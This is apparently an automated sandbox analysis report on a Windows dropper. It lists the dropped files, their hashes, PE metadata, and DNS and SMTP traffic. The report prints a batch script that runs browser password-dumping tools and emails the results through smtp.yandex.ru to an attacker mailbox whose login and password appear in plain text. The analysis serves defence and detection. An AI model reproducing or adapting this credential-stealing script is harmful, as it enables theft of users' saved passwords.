                                      SHA-512:AF68749CADF9920A8BED455A2557B1FAF475D30FDD62F45DA6757FBC5A59341FFFECCCA4FF646B334DA95CF673DEEEEA74BDBB27A16F510A4E3309055F89817D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K...%E..%E..%E..xE..%E<.xE..%E..$E.%EW.!E..%EW..E..%EW./E..%E<.+E..%E..zE..%E..EE..%E..yE..%ES.{E..%E...E..%ERich..%E................PE..L......E...........!.........F.......#.......0......................................................................`...v...4...x....`.......................p.......................................................0...............................text............................... ..`.rdata...|...0...~... ..............@..@.data...............................@....rsrc........`......................@..@.reloc..$....p......................@..B................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):115200
                                      Entropy (8bit):6.382552176662548
                                      Encrypted:false
                                      SSDEEP:3072:ag5DTZCatGyIMzdze3BO+ggUFLVRM8uTv/3hH4:zDTZCatGyI+dze3BNgpVRM8+H
                                      MD5:31F84E433E8D1865E322998A41E6D90E
                                      SHA1:CBEA6CDA10DB869636F57B1CFFAD39B22E6F7F17
                                      SHA-256:AECA4A77D617DA84296B5F857B2821333FE4B9663E8DF74EF5A25A7882693E5E
                                      SHA-512:7AE504723B5B140E45AF3163D1BFDC5EE0497DEBAFBA07CFBF1D2C15147C000BE53F4AC8D36D926ED11CF0BB62E9E72F9BCF5D4CAF92AA732D942F55834E2BE9
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q..5..T5..T5..T&..T7..T...T3..T5..TL..T..T6..T..T4..T...T7..T..T>..T0..T4..T0..T&..T..T4..T0..T4..TRich5..T................PE..L......E.....................(.......".......0....@..........................p..............................................l...x....`..(............................................................................0...............................text............................... ..`.rdata..h}...0...~... ..............@..@.data..............................@....rsrc...(....`......................@..@................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\600.tmp\blat.lib

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:current ar archive
                                      Category:dropped
                                      Size (bytes):2174
                                      Entropy (8bit):4.670703997043367
                                      Encrypted:false
                                      SSDEEP:48:Rq3SAQJbl/zKKOyAO5Ds3KAs0aUKsRXRqjzq:FKcCKGKuham
                                      MD5:3CD3CFFDA2B5108E2778F94429C624D6
                                      SHA1:3E4D218D1B8EB4FA1AB5152B126951892AFF3DC9
                                      SHA-256:B545194041588FC0A6F57E7EB5A93D2418AAA263D246E3C696A79EE5859770FF
                                      SHA-512:C80080AFCC982C4E950876756FB32C7F24FBE45BFBBE78AFE144BE1EDE86DC9EF1E57DB95D3DF7F4C6011FD226F23684B929781B55D1BE659CFA75D14F8D0C79
                                      Malicious:false
                                      Preview:!<arch>./ 1172423196 0 222 `........N...n.......R...R........................__IMPORT_DESCRIPTOR_BLAT.__NULL_IMPORT_DESCRIPTOR..BLAT_NULL_THUNK_DATA._Send@4.__imp__Send@4._Blat@8.__imp__Blat@8._SetPrintFunc@4.__imp__SetPrintFunc@4.__imp__cSend._cSend./ 1172423196 0 240 `.....N...n.......R................................................._Blat@8._Send@4._SetPrintFunc@4.__IMPORT_DESCRIPTOR_BLAT.__NULL_IMPORT_DESCRIPTOR.__imp__Blat@8.__imp__Send@4.__imp__SetPrintFunc@4.__imp__cSend._cSend..BLAT_NULL_THUNK_DATA.BLAT.dll/ 1172423196 0 483 `.L......E.............debug$S........?...................@..B.idata$2............................@.0..idata$6............................@. ..............BLAT.dll(......................Microsoft (R) LINK...................................................BLAT.dll..@comp.id..]..........................idata$2@.......h..idata$6...........idata$4@......

                                      C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):44544
                                      Entropy (8bit):7.580825428946343
                                      Encrypted:false
                                      SSDEEP:768:TI/86WM0Rk9UXwYlX154ozTouldUZlhPOH6lvXsV:uKkKgYlXck075POaVXsV
                                      MD5:C861FE184E271D6E2BA958DA306BA748
                                      SHA1:B039E4D8E70261DFDF8EE521DCBC3E04348423A5
                                      SHA-256:F8A112B0D1CE4142E4D69CADFC2748C27026B491532FBA18D9160F7EB48B4886
                                      SHA-512:EA127EAA149B5FF1B1F1DE3891563B2E064E043F03E48CA298D3539E1F572297ABD4EFD951021372BA0090B8C30C06E7D144BEC6D9828A5CC08A644155A8F3CE
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[..[..[..Ax..[..ax..[..Ax..[..xT..[..[..Z....[....[....[..Rich.[..........PE..L...;.)M..................... ......p.............@.............................................................................8...................................................................................................................UPX0....................................UPX1................................@....rsrc.... ..........................@..............................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

                                      C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1272
                                      Entropy (8bit):5.031296977639238
                                      Encrypted:false
                                      SSDEEP:24:1hpvjh1jh1dVjhvuSgoHU5hrgXQ5k6gO4dqfgP5kss3d+:1Lj7jrj1uSrsDn65z
                                      MD5:C328282B75C4BDFF5E7F3E1C7F4C64D4
                                      SHA1:676C48A4407CC752FB84C91CCFF147EF5E82B94B
                                      SHA-256:B899DA4A716D950F5ADCF06401CE2D519EB34BD16D72862766717BDF27E64F03
                                      SHA-512:DA0C42B18A73A1B6C85D56CCA1D4E0D9C40E9051C58DB3859166939E813245A9678DECB29F405974571A9C9AD38594421BF2EB604128F460F3F54FCC84809683
                                      Malicious:false
                                      Preview:@echo off....start 1.jpg..ping -n 3 127.0.0.1 > nul..start OperaPassView.exe /stext %computername%_OperaPassView.txt..ping -n 3 127.0.0.1 > nul..start PasswordFox.exe /stext %computername%_PasswordFox.txt..ping -n 3 127.0.0.1 > nul..start iepv.exe /stext %computername%_iepv.txt..ping -n 3 127.0.0.1 > nul..start ChromePass.exe /stext %computername%_ChromePass.txt......ping -n 120 127.0.0.1 > nul....blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5..ping -n 3 127.0.0.1 > nul..blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "%computername%_OperaPassView.txt" -body "Opera"..ping -n 3 127.0.0.1 > nul..blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "%computername%_PasswordFox.txt" -body "Fox"..ping -n 3 127.0.0.1 > nul..blat.exe -to alexandrKondratiev5@yandex.ru -subject "ie" -attachi "%computername%_iepv.txt" -body "ie"..ping -n 3 127.0.0.1 > nul..blat.exe -to alexandrKondratiev5@ya

                                      \Device\ConDrv

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):490
                                      Entropy (8bit):5.042252623136629
                                      Encrypted:false
                                      SSDEEP:12:MYBqKY+H2l28apN/aKM77fEN5sKN5ssWLtE:9BG/o8an/Ov05sy5ssWLq
                                      MD5:0F56F90F3D9AC56D6003C23F7032D084
                                      SHA1:5F83DBCC43259F0AD5B9E235988DCFFAFCF5F8C4
                                      SHA-256:46775236B9DE29CF92B0C51F5BACD4B2C1567DD1D29C3446D20994CBCB0D4DF5
                                      SHA-512:E77832AF1322F25E16ABB7B3CD2B3D503CE7F7BB678CDAD36C53264CDB63287FB2E520019E987B30033EECA90F58414627812C190108AB02150C1B476406AB4D
                                      Malicious:false
                                      Preview:Blat v2.6.2 w/GSS encryption (build : Feb 25 2007 12:06:19)....Sending stdin.txt to alexandrKondratiev5@yandex.ru..Subject: Chrome..Login name is alexandrKondratiev5@yandex.ru..Attached text file: user-PC_ChromePass.txt..The SMTP server did not accept Auth PLAIN value...Are your login userid and password correct?..The SMTP server does not require AUTH LOGIN...Are you sure server supports AUTH?..The SMTP server does not like the sender name...Have you set your mail address correctly?..

                                      \Device\Null

                                      Download File
                                      Process:C:\Windows\SysWOW64\PING.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):380
                                      Entropy (8bit):4.937448817509359
                                      Encrypted:false
                                      SSDEEP:6:PzLSLzMRfmWxHLThx2LThx2LThx0sW26wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeTeT0sKvtAFSkIrxMVlmJHaVz
                                      MD5:63A3D026F6E4381585F5AEFACE172263
                                      SHA1:3EA8FDD98AA9F20167008F57DAA6F8ED3ECA9738
                                      SHA-256:4C31393CE8AE5EA969A049B3FF5DD0EA18E6C29E0E59841BEC1D7AFB7C64DE4C
                                      SHA-512:FB88787000A6D258A1E3AAB97C46B8D92E68071B8E55C8F98278CB474AE6AFB31256A58BF198132D251F8EC666F28C085A88A103C8DB029B3B188F77163BE793
                                      Malicious:false
                                      Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.912537280939596
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • VXD Driver (31/22) 0.00%
                                      File name:0zu73p2YBu.exe
                                      File size:642'048 bytes
                                      MD5:29eca65ffa92a3f877b59df42e2150ed
                                      SHA1:df50e54f9a2b5b6b8831a1e967fba1292ef31790
                                      SHA256:01356f359af7ecda0db1b00ebcb7bc844ce1fb36bbdbf812bf4a749c22f0d620
                                      SHA512:5f14f26c54a5f2f9fcbe2d4de9fb35cc32e1f82f42d8ae9f22d5f9cc8180fc210301b08cb661e424e65bfb0968ef6534f09d8bd5deee284e3e776a830c4709e5
                                      SSDEEP:12288:BJnkD1kdcQjttsMFVpIDd0xoBBxBLCmbyjSzHIYJ5gfnOKVjwboNsgB:vkudcQjttdV0d0GBBxVrujSzoYIrjwbE
                                      TLSH:CAD402C3E8952FF8D62FC8B7764A40438D71F491179863B1779E8EA310E540792BBA8D
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D.N..................................... ....@........................................................................

                                      File Icon

                                      Icon Hash:f3c74d49ca4e6e7c

                                      Static PE Info

                                      General

                                      Entrypoint:0x401ad8
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:
                                      Time Stamp:0x4EB8440D [Mon Nov 7 20:48:13 2011 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:94400fe3e62cd2376124312fe435b8e4

                                      Entrypoint Preview

                                      Instruction
                                      call 00007F1655231698h
                                      mov dword ptr [0040300Bh], eax
                                      push 00000000h
                                      call 00007F16552316A4h
                                      mov dword ptr [00403013h], eax
                                      call 00007F16552316A6h
                                      mov dword ptr [00410670h], eax
                                      push 0000000Ah
                                      push dword ptr [0040300Bh]
                                      push 00000000h
                                      push dword ptr [00403013h]
                                      call 00007F1655230AE8h
                                      push 00000000h
                                      call 00007F165523164Fh
                                      jmp dword ptr [004020B4h]
                                      jmp dword ptr [004020B0h]
                                      jmp dword ptr [004020ACh]
                                      jmp dword ptr [004020A8h]
                                      jmp dword ptr [004020A4h]
                                      jmp dword ptr [004020A0h]
                                      jmp dword ptr [0040209Ch]
                                      jmp dword ptr [00402098h]
                                      jmp dword ptr [00402094h]
                                      jmp dword ptr [00402090h]
                                      jmp dword ptr [0040208Ch]
                                      jmp dword ptr [00402088h]
                                      jmp dword ptr [00402084h]
                                      jmp dword ptr [00402034h]
                                      jmp dword ptr [00402038h]
                                      jmp dword ptr [0040203Ch]
                                      jmp dword ptr [00402040h]
                                      jmp dword ptr [00402044h]
                                      jmp dword ptr [00402048h]
                                      jmp dword ptr [0040204Ch]
                                      jmp dword ptr [00402050h]
                                      jmp dword ptr [00402054h]
                                      jmp dword ptr [00402000h]
                                      jmp dword ptr [00000000h]

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x20bc0x50.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x9ace0.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000xbc.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000xc1c0xe004b3f16d7c1b1a72b03a6b6a1781a9421False0.4771205357142857data5.123931017549605IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x20000x4c00x600128067a33e449c96b8dc66824ad4bcd5False0.4088541666666667data4.217635826521946IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x30000xd6f00x6007701054449ed29f5803ce4903a7bfc7bFalse0.16927083333333334data1.725550805200182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x110000x9ace00x9ae0023a1bd3fd1fad6deedcc48bfc8342afaFalse0.946594090496368data7.921113520173662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      IMAGE0x112100x42PC bitmap, Windows 3.x format, 1 x 1 x 1, image size 4, cbSize 66, bits offset 62EnglishUnited States0.5151515151515151
                                      RT_ICON0x112540x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3937 x 3937 px/m0.7863475177304965
                                      RT_ICON0x116bc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3937 x 3937 px/m0.7070825515947468
                                      RT_ICON0x127640x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3937 x 3937 px/m0.666908713692946
                                      RT_ICON0x14d0c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3937 x 3937 px/m0.6154915414645687
                                      RT_RCDATA0x255340x8670cdata0.9956325771608301
                                      RT_RCDATA0xabc400x5edata0.8297872340425532
                                      RT_GROUP_ICON0xabca00x3edata0.8064516129032258

                                      Imports

                                      DLLImport
                                      user32.dllUpdateWindow, TranslateMessage, ShowWindow, SendMessageA, RegisterClassExA, PostQuitMessage, MessageBoxA, LoadIconA, LoadCursorA, GetMessageA, DispatchMessageA, DefWindowProcA, CreateWindowExA
                                      kernel32.dllGetModuleHandleA, HeapAlloc, lstrlenA, lstrcpynA, lstrcpyA, lstrcatA, WriteFile, SizeofResource, SetFileAttributesA, RtlMoveMemory, LockResource, LoadResource, LoadLibraryA, CloseHandle, CreateFileA, ExitProcess, FindResourceA, FreeResource, GetCommandLineA, GetEnvironmentVariableA, GetFileSize, GetModuleFileNameA, GlobalFree, GetProcAddress, GetProcessHeap, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GlobalAlloc, HeapFree
                                      shlwapi.dllPathFindFileNameA

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 20, 2024 18:16:11.868102074 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:11.990236044 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:11.990369081 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:13.327908993 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:13.328243017 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:13.448311090 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:13.779552937 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:13.822511911 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:16.183092117 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:16.302747965 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:16.633975983 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:16.634306908 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:16.760273933 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:17.091847897 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:17.092181921 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:17.214102030 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:17.546240091 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:17.547012091 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:17.667964935 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:17.998668909 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:17.998811007 CET5874977377.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:17.998950958 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:18.000125885 CET49773587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:20.219835043 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:20.339644909 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:20.339843988 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:21.644499063 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:21.644757986 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:21.766612053 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:22.094769955 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:22.135102987 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:24.355240107 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:24.483371973 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:24.813040972 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:24.813414097 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:24.935065031 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:25.264879942 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:25.265281916 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:25.386400938 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:25.713968039 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:25.714380026 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:25.838973045 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:26.167982101 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:26.168102026 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:26.168275118 CET5874979477.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:26.168329000 CET49794587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:28.410141945 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:28.533804893 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:28.533994913 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:30.503196955 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:30.503515959 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:30.624859095 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:30.953548908 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:30.994404078 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:33.214977026 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:33.336726904 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:33.667423964 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:33.667799950 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:33.787590027 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:34.116558075 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:34.116959095 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:34.421134949 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:34.750417948 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:34.750996113 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:34.871990919 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:35.201277971 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:35.201572895 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:35.201667070 CET5874981277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:35.201730013 CET49812587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:37.461932898 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:37.581631899 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:37.581729889 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:38.904958010 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:38.905217886 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:39.024863958 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:39.358840942 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:39.400790930 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:41.605813980 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:41.725869894 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:42.060802937 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:42.061247110 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:42.187500954 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:42.519639969 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:42.520215034 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:42.640882015 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:42.973721027 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:42.974473000 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:43.097871065 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:43.429357052 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:43.429617882 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:43.429840088 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:43.429904938 CET49832587192.168.2.477.88.21.158

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 20, 2024 18:16:11.723012924 CET6330353192.168.2.41.1.1.1
                                      Nov 20, 2024 18:16:11.864573956 CET53633031.1.1.1192.168.2.4
                                      Nov 20, 2024 18:16:13.781656981 CET5955453192.168.2.41.1.1.1
                                      Nov 20, 2024 18:16:13.926933050 CET53595541.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 20, 2024 18:16:11.723012924 CET192.168.2.41.1.1.10xce81Standard query (0)smtp.yandex.ruA (IP address)IN (0x0001)false
                                      Nov 20, 2024 18:16:13.781656981 CET192.168.2.41.1.1.10x8978Standard query (0)yandex.ruA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 20, 2024 18:16:11.864573956 CET1.1.1.1192.168.2.40xce81No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)false
                                      Nov 20, 2024 18:16:13.926933050 CET1.1.1.1192.168.2.40x8978No error (0)yandex.ru5.255.255.77A (IP address)IN (0x0001)false
                                      Nov 20, 2024 18:16:13.926933050 CET1.1.1.1192.168.2.40x8978No error (0)yandex.ru77.88.55.88A (IP address)IN (0x0001)false
                                      Nov 20, 2024 18:16:13.926933050 CET1.1.1.1192.168.2.40x8978No error (0)yandex.ru77.88.44.55A (IP address)IN (0x0001)false

                                      SMTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Nov 20, 2024 18:16:13.327908993 CET5874977377.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1732122973-CGWIbm7OqGk0
                                      Nov 20, 2024 18:16:13.328243017 CET49773587192.168.2.477.88.21.158EHLO 927537.yandex.ru
                                      Nov 20, 2024 18:16:13.779552937 CET5874977377.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-SIZE 53477376
                                      250-STARTTLS
                                      250-AUTH LOGIN PLAIN XOAUTH2
                                      250-DSN
                                      250 ENHANCEDSTATUSCODES
                                      Nov 20, 2024 18:16:16.183092117 CET49773587192.168.2.477.88.21.158AUTH PLAIN AGFsZXhhbmRyS29uZHJhdGlldjUAcXdlcnR5NQ==
                                      Nov 20, 2024 18:16:16.633975983 CET5874977377.88.21.158192.168.2.4530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122976-CGWIbm7OqGk0
                                      Nov 20, 2024 18:16:16.634306908 CET49773587192.168.2.477.88.21.158AUTH LOGIN
                                      Nov 20, 2024 18:16:17.091847897 CET5874977377.88.21.158192.168.2.4530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122976-CGWIbm7OqGk0
                                      Nov 20, 2024 18:16:17.092181921 CET49773587192.168.2.477.88.21.158MAIL FROM:<alexandrKondratiev5@yandex.ru>
                                      Nov 20, 2024 18:16:17.546240091 CET5874977377.88.21.158192.168.2.4503 5.5.4 Error: send AUTH command first. 1732122977-CGWIbm7OqGk0-ZV5W5d5G
                                      Nov 20, 2024 18:16:17.547012091 CET49773587192.168.2.477.88.21.158QUIT
                                      Nov 20, 2024 18:16:17.998668909 CET5874977377.88.21.158192.168.2.4221 2.0.0 Closing connecton
                                      Nov 20, 2024 18:16:21.644499063 CET5874979477.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-44.sas.yp-c.yandex.net Ok 1732122981-LGW1jF7OhKo0
                                      Nov 20, 2024 18:16:21.644757986 CET49794587192.168.2.477.88.21.158EHLO 927537.yandex.ru
                                      Nov 20, 2024 18:16:22.094769955 CET5874979477.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-44.sas.yp-c.yandex.net
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-SIZE 53477376
                                      250-STARTTLS
                                      250-AUTH LOGIN PLAIN XOAUTH2
                                      250-DSN
                                      250 ENHANCEDSTATUSCODES
